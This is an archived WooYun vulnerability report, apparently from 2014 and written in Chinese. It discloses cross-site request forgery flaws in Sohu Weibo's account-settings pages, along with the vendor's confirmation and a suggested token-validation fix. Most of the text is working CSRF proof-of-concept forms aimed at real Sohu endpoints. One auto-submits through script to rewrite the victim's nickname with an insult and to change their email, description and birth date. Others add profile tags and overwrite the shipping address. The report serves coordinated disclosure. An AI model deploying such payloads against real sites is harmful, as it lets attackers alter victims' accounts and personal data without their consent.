乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-18: 细节已通知厂商并且等待厂商处理中 2014-02-18: 厂商已经确认,细节仅向厂商公开 2014-02-28: 细节向核心白帽子及相关领域专家公开 2014-03-10: 细节向普通白帽子公开 2014-03-20: 细节向实习白帽子公开 2014-04-04: 细节向公众公开
搜狐微博的csrf漏洞,不知道能有多少rank呢,求礼物啊
No.1 昵称和个人资料基本资料被修改CSRF。
<script> function randomUName(){ var uname=document.createElement("input"); uname.type="hidden"; uname.name="username"; var nameValue=encodeURIComponent(("卧室SB"+Math.random()*1000000000).substr(0,10)+"号"); uname.value=nameValue; document.getElementById("modifyInfo").appendChild(uname); document.getElementById("modifyInfo").submit(); } </script> <form action="http://t.sohu.com/settings/base/set" method="POST" id="modifyInfo"> <input type="hidden" name="sex" value="1" /> <input type="hidden" name="schoolid" value="0" /> <input type="hidden" name="areaid" value="0" /> <input type="hidden" name="email" value="daliang987@126.com" /> <input type="hidden" name="description" value="just for fun!%E4%BD%A0%E7%9A%84%E8%B5%84%E6%96%99%E8%A2%AB%E6%94%B9%E5%86%99%E4%BA%86%EF%BC%81%E5%91%B5%E5%91%B5%E5%91%B5" /> <input type="hidden" name="year" value="1989" /> <input type="hidden" name="month" value="11" /> <input type="hidden" name="day" value="25" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="realName" value="" /> <input type="hidden" name="cardType" value="1" /> <input type="hidden" name="cardId" value="" /> <input type="hidden" name="proc" value="1" /> <input type="hidden" name="city" value="5" /> </form>
证明:
谁点谁知道。。。
No.2 标签修改CSRF
<html> <!-- CSRF PoC - generated by burp suite professional --> <body> <form action="http://t.sohu.com/settings/tag/addTag" method="POST"> <input type="hidden" name="tagname" value="adm1nSB" /> <input type="hidden" name="tagtype" value="0" /> <input type="submit" value="Submit form" /> </form> </body></html>
No.3 收货地址CSRF
<body> <form action="http://t.sohu.com/settings/address/set" method="POST"> <input type="hidden" name="contactInfoRealName" value="%E7%8E%8B%E5%B0%BC%E7%8E%9B" /> <input type="hidden" name="contactInfoMobile" value="18622221111" /> <input type="hidden" name="contactInfoProvince" value="1" /> <input type="hidden" name="contactInfoCity" value="1" /> <input type="hidden" name="contactInfoAddress" value="%E4%B8%8D%E7%9F%A5%E9%81%93%E5%95%8A" /> <input type="hidden" name="contactInfoZipCode" value="101000" /> <input type="submit" value="Submit form" /> </form> </body>
以上主要就是针对资料修改的一些csrf,求礼物啊
token验证
危害等级:中
漏洞Rank:10
确认时间:2014-02-18 17:02
感谢对搜狐安全的支持。
暂无